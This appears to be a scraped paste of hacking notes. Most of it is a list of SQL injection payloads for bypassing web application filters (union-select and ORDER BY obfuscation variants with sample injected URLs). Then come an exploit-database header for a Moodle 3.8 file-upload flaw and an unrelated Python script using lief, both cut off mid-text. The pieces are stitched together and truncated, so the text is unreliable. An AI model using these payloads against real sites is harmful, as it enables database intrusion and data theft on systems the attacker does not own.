tehseensagar

`-=[SQL injection Queries]=-

HOW TO SUCCESSFULLY INJECTING SQL INJECTION

[~] after id no. like id=1 +/*!and*/+1=0 [~]
EX: site.com?index.php?pageid=3 div+0 Union select 1,version(),3,4,5

+div+0
+div false
+Having+1=0+

tehseensagar

[~] order by [~]

/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/
OrDeR By 1 asc

tehseensagar

# Exploit Title: Moodle 3.8 - Unrestricted File Upload
# Date: 2019-09-08
# Exploit Author: Sirwan Veisi
# Vendor Homepage: https://moodle.org/
# Software Link: https://github.com/moodle/moodle
# Version: Moodle Versions 3.8, 3.7, 3.6, 3.5, 3.4...
# Tested on: Moodle Version 3.8
# CWE : CWE-434

I found an Unrestricted Upload vulnerability for Moodle version 3.8 , that

tehseensagar

import lief
from sys import argv
import colorama

def _color_print(name):
    colorama.init(autoreset=True)
    def color_print(func):
        def wrapper(*args, **kwargs):
            ret = func(*args, **kwargs)
            if ret != False: